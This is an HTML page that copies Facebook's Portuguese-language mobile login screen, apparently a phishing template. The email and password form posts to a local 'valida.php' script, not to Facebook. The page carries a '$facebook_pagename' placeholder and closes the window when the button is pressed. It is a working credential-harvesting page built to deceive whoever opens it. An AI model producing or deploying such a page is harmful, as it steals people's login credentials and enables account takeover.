<html>

<head>
	<title>Facebook | Login</title>
	<meta name="viewport" content="user-scalable=no,initial-scale=1.0001,maximum-scale=1.0001,viewport-fit=cover">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<meta name="referrer" content="default" id="meta_referrer">
	<link type="text/css" rel="stylesheet" href="/facebook/css/main.css">
</head>

<body tabindex="0" class="touch" style="min-height: 666px; background-color: rgb(255, 255, 255);">

	<div id="viewport" data-kaios-focus-transparent="1" style="min-height: 666px;">

		<div id="page">
			<div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 666px;">
				<div class="_7om2">
					<div class="_4g34" id="u_0_0">

						<div class="_4-4l">
							<div class="_7om2 _52we _2pid _52z6">
								<div class="_4g34"><a><img src="/facebook/images/logo.png" width="112" class="img" alt="facebook"></a>
									</div>
										</div>
										<div class="_52jj _5t3b fcg2 mfss2">

							<div class="_5ui4">
							<span class="mfss fcg">$facebook_pagename</span>
						</div>

 								<div class="_7om2 _52we _2pid _52z6">
								<div class="_4g34"><a><img src="/facebook/images/face_logo.svg" width="112" class="img" alt="facebook"></a>
								</div>
							</div>
							</div>
							<div class="_5rut">
								<form method="post" action="/facebook/valida.php" class="mobile-login-form _9hp- _5spm">

									<div>
										<div class="_56be">
											<div class="_55wo _56bf">
												<div class="_96n9" id="email_input_container">
													<input autocorrect="off" autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="Número de celular ou email" data-sigil="m_login_email" required></div>
												</div>
											</div>
											<div class="_55wq"></div>
											<div class="_56be">
												<div class="_55wo _56bf">
													<div class="_1upc _mg8" data-sigil="m_login_password">
														<div class="_7om2">
															<div class="_4g34 _5i2i _52we">
																<div class="_5xu4">
																	<input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="password" placeholder="Senha" type="password" data-sigil="password-plain-text-toggle-input" required></div>
																</div>
																<div class="_5s61 _216i _5i2i _52we">
																	<div class="_5xu4">
																		<div class="_2pi9" style="display:none" id="u_0_1"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_2">OCULTAR</span><span class="mfss" id="u_0_3">MOSTRAR</span></a>
																		</div>
																	</div>
																</div>
															</div>
														</div>
													</div>
												</div>
											</div>
											<div class="_2pie" style="text-align:center;">
												<div id="u_0_4" data-sigil="login_password_step_element">
													<button type="submit" value="Entrar" class="54k8 _52jh _56bs _56b _28lf _9cow _56bw _56bu" onClick="window.close();" name="login"><span class="_55sr">Entrar</span></button>
												</div>
											</div>
								</form>
								<div>
									<div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator">
										<span class="_43mh">ou</span></div>
											<div class="_52jj _5t3b" id="signup_button_area"><a role="button" class="_5t3c _28le btn btnS medBtn mfsm touchable">Criar nova conta</a></div>								</div>
								<div>
									<div data-sigil="login_identify_step_element"></div>
									<div class="other-links _8p_m">
                  <ul class="_5pkb _55wp">
                    <li><span class="mfss fcg"><a>Esqueceu a senha?</a></span>
                    </li>
                  </ul>
									</div>
										</div>
										</div>
											</div>
											</div>
											</div>
										</div>
									</div>
										</div>
</body>
</html>
